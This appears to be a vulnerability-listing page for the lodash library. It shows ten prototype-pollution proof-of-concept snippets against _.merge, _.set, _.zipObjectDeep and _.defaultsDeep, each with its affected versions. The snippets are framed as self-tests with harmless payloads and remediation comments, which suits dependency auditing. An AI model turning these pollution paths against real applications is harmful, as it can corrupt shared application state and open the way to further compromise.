
lodash

Lodash modular utilities.

Latest version: 4.17.21

Exploits

// Dependency self-test: reports whether the installed lodash lets a deep merge
// of parsed JSON write through the "__proto__" key onto Object.prototype.
// Run it in a throwaway process; a positive result leaves Object.prototype.a
// set for the rest of that process.
const _ = require('lodash');

// JSON.parse stores "__proto__" as an ordinary own property, so a recursive
// merge that does not skip this key descends into the destination's prototype.
const payload = JSON.parse('{"__proto__": {"a": "b"}}');
_.merge({}, payload);

// A fresh object literal has no own "a"; seeing 'b' here means every object
// in the process now inherits it. Remediation is to move to a lodash release
// that is not in the vulnerable list and to avoid deep-merging untrusted input.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 0.5.0-rc.1 0.5.0 0.5.1 0.5.2 0.6.0 0.6.1 0.7.0 0.8.0 0.8.1 0.8.2 0.9.0 0.9.1 0.9.2 0.10.0 1.0.0-rc.1 1.0.0-rc.2 1.0.0-rc.3 1.0.0 1.0.1 1.1.0 1.1.1 1.2.0 1.2.1 1.3.0 1.3.1 2.0.0 2.1.0 2.2.0 2.2.1 2.3.0 2.4.0 2.4.1 3.0.0 3.0.1 3.1.0 3.2.0 3.3.0 3.3.1 3.4.0 3.5.0 3.6.0 1.0.2 3.7.0 2.4.2 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4

// Dependency self-test: reports whether the installed lodash lets a deep merge
// reach Object.prototype through the "constructor" -> "prototype" chain.
// Run it in a throwaway process; a positive result leaves Object.prototype.a
// set for the rest of that process.
const _ = require('lodash');

// ({}).constructor is Object, so constructor.prototype is Object.prototype.
// A merge that blocks only "__proto__" still follows this route.
const payload = JSON.parse('{"constructor": {"prototype": {"a": "b"}}}');
_.merge({}, payload);

// An unrelated, freshly created object is inspected: inheriting 'b' shows the
// shared prototype was modified. Key filters in application code should reject
// "constructor" and "prototype" as well as "__proto__".
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10

// Dependency self-test: reports whether the installed lodash lets
// _.zipObjectDeep assign onto Object.prototype when a property path starts
// with "__proto__". Run it in a throwaway process; a positive result leaves
// Object.prototype.a set for the rest of that process.
const _ = require('lodash');

// zipObjectDeep treats each entry of the first array as a property path, so
// path strings taken from untrusted input decide where the value is written.
const paths = ['__proto__.a'];
const values = ['b'];
_.zipObjectDeep(paths, values);

// A new empty object should not expose "a"; if it does, the write landed on
// the shared prototype rather than on the object zipObjectDeep returned.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

// Dependency self-test: reports whether the installed lodash lets
// _.zipObjectDeep assign onto Object.prototype via a "constructor.prototype"
// path. Run it in a throwaway process; a positive result leaves
// Object.prototype.a set for the rest of that process.
const _ = require('lodash');

// The path walks result.constructor (Object) and then .prototype, which is the
// same object a "__proto__" path would reach, without using that key.
const paths = ['constructor.prototype.a'];
const values = ['b'];
_.zipObjectDeep(paths, values);

// Inspect an object that was never passed to lodash: an inherited 'b' means
// the prototype shared by all plain objects was changed.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

// Dependency self-test: reports whether the installed lodash lets _.set write
// onto Object.prototype when the path is an array whose "__proto__" segment is
// itself wrapped in an array. Run it in a throwaway process; a positive result
// leaves Object.prototype.a set for the rest of that process.
const _ = require('lodash');

// NOTE(review): the nested-array segment presumably behaves as the key
// "__proto__" once it is used for property access, so a guard that compares
// segments with the literal string would not match it; confirm against the
// lodash version under test.
const target = {};
const path = [['__proto__'], 'a'];
_.set(target, path, 'b');

// `target` is discarded; the check looks at a different, fresh object to show
// whether the write escaped to the shared prototype.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

// Dependency self-test: reports whether the installed lodash lets _.set write
// onto Object.prototype through an array path whose "constructor" and
// "prototype" segments are each wrapped in an array. Run it in a throwaway
// process; a positive result leaves Object.prototype.a set afterwards.
const _ = require('lodash');

// NOTE(review): the wrapped segments presumably resolve to the keys
// "constructor" and "prototype" at access time, which would slip past a guard
// that only recognises plain string segments; confirm against the lodash
// version under test.
const target = {};
const path = [['constructor'], ['prototype'], 'a'];
_.set(target, path, 'b');

// A fresh object literal is checked rather than `target`, so a hit proves the
// value is inherited from Object.prototype.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

// Dependency self-test: reports whether the installed lodash lets _.set write
// onto Object.prototype when given the dotted string path "__proto__.a".
// Run it in a throwaway process; a positive result leaves Object.prototype.a
// set for the rest of that process.
const _ = require('lodash');

// The risk in real code is a path string that comes from a request or a
// config file: whoever controls the path chooses the object being written to.
const target = {};
const path = '__proto__.a';
_.set(target, path, 'b');

// An object created after the call should have no "a"; if it reads 'b', the
// assignment reached the prototype shared by every plain object.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

// Dependency self-test: reports whether the installed lodash lets _.set write
// onto Object.prototype when given the dotted path "constructor.prototype.a".
// Run it in a throwaway process; a positive result leaves Object.prototype.a
// set for the rest of that process.
const _ = require('lodash');

// target.constructor is Object and Object.prototype is the prototype of every
// plain object, so this path is equivalent to a "__proto__" path and must be
// rejected by the same allow/deny logic.
const target = {};
const path = 'constructor.prototype.a';
_.set(target, path, 'b');

// The probe object never touched lodash; an inherited 'b' confirms pollution.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 3.7.0 3.8.0 3.9.0 3.9.1 3.9.2 3.9.3 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11 4.17.12 4.17.13 4.17.14 4.17.15 4.17.16

// Dependency self-test: reports whether the installed lodash lets
// _.defaultsDeep write through a "__proto__" key in parsed JSON onto
// Object.prototype. Run it in a throwaway process; a positive result leaves
// Object.prototype.a set for the rest of that process.
const _ = require('lodash');

// defaultsDeep is commonly fed request bodies or option objects; JSON.parse
// keeps "__proto__" as an own key, which a recursive fill can then follow
// into the destination's prototype.
const payload = JSON.parse('{"__proto__": {"a": "b"}}');
_.defaultsDeep({}, payload);

// A brand-new object is inspected: 'b' appearing on it means the default was
// applied to the shared prototype instead of the destination object.
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4

// Dependency self-test: reports whether the installed lodash lets
// _.defaultsDeep reach Object.prototype through the "constructor" ->
// "prototype" chain in parsed JSON. Run it in a throwaway process; a positive
// result leaves Object.prototype.a set for the rest of that process.
const _ = require('lodash');

// The destination's constructor is Object, so recursing into
// constructor.prototype ends at Object.prototype even when "__proto__" keys
// are filtered out.
const payload = JSON.parse('{"constructor": {"prototype": {"a": "b"}}}');
_.defaultsDeep({}, payload);

// Checking an unrelated empty object separates "the destination was changed"
// from "every object in the process was changed".
const probe = {};
if (probe.a === 'b') {
  console.log('exploitable');
}

Vulnerable versions: 3.10.0 3.10.1 4.0.0 4.0.1 4.1.0 4.2.0 4.2.1 4.3.0 4.4.0 4.5.0 4.5.1 4.6.0 4.6.1 4.7.0 4.8.0 4.8.1 4.8.2 4.9.0 4.10.0 4.11.0 4.11.1 4.11.2 4.12.0 4.13.0 4.13.1 4.14.0 4.14.1 4.14.2 4.15.0 4.16.0 4.16.1 4.16.2 4.16.3 4.16.4 4.16.5 4.16.6 4.17.0 4.17.1 4.17.2 4.17.3 4.17.4 4.17.5 4.17.9 4.17.10 4.17.11